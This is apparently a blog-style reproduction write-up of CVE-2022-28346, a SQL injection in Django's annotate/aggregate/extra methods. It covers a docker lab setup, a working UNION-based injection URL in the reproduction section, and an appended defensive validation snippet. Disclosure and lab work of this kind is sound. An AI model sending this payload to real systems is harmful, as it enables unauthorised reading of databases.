Cve-2022-28346: Django SQL injection vulnerability
2022-07-08 00:41:00 【yggcwhat】
0x01 Brief introduction
Django is a free, open-source web framework written in Python. It covers almost every aspect of web application development and can be used to quickly build high-performance, elegant websites. Django ships with many modules commonly needed in website back-end development, so developers can concentrate on the business logic.
0x02 Vulnerability summary
CVE ID: CVE-2022-28346
An attacker can pass a carefully crafted dictionary, expanded as **kwargs, to the QuerySet.annotate(), aggregate() and extra() methods, which makes these methods vulnerable to SQL injection.
0x03 Affected versions
4.0 <= Django < 4.0.4
3.2 <= Django < 3.2.13
2.2 <= Django < 2.2.28
0x04 Environment setup
docker pull s0cke3t/cve-2022-28346:latest
docker run -d -p 8080:8000 s0cke3t/cve-2022-28346
0x05 Vulnerability reproduction
The existing endpoints can be discovered from the error page.
If the accessed endpoint takes parameters, the error message reveals them as well.
Use the parameter shown in the error message to perform the SQL injection:
http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --
0x06 Fix
A patched version has been released officially; download it from:
https://www.djangoproject.com/download/
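As an added illustration of the vulnerability summary and the fix above (this is not code from the page, the demo image, or Django itself), the snippet below shows why merely quoting a caller-supplied annotation name is not enough, and a defensive check modelled on the alias validation that the patched Django releases apply. The pattern, the function names and the allowlist are assumptions chosen for this example; the crafted alias is the one from the reproduction URL on this page.

```python
import re

# Hypothetical re-implementation of the kind of alias check the fixed Django
# releases perform: reject quotes, brackets, semicolons, whitespace and SQL
# comment markers so the alias can never leave the quoted identifier.
FORBIDDEN_ALIAS_PATTERN = re.compile(r"['`\"\]\[;\s]|--|/\*|\*/")


def is_safe_alias(alias: str) -> bool:
    """True if `alias` contains nothing that could break out of "..." quoting."""
    return FORBIDDEN_ALIAS_PATTERN.search(alias) is None


def check_alias(alias: str) -> None:
    """Raise ValueError for an alias that would be unsafe as a SQL identifier."""
    if not is_safe_alias(alias):
        raise ValueError(f"column alias contains forbidden characters: {alias!r}")


def naive_select(alias: str, table: str) -> str:
    """Mimic the unpatched behaviour: the alias is quoted but never validated.
    A crafted alias closes the quote and appends its own SQL."""
    return f'SELECT "{alias}" FROM "{table}"'


def safe_annotate_kwargs(params: dict, allowed: set) -> dict:
    """Build the **kwargs for QuerySet.annotate()/aggregate() from request
    parameters. Every key must pass check_alias() AND be on an application
    allowlist; anything else is rejected before it reaches the ORM."""
    result = {}
    for key, value in params.items():
        check_alias(key)                      # structural check
        if key not in allowed:                # application-level allowlist
            raise ValueError(f"unexpected annotation name: {key!r}")
        result[key] = value
    return result


# Constructed sample: the alias taken from this page's reproduction URL.
CRAFTED_ALIAS = 'demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" --'
```

Calling `naive_select(CRAFTED_ALIAS, "demo_user")` shows the quote being closed and a UNION appended, while `check_alias(CRAFTED_ALIAS)` raises before any SQL is built.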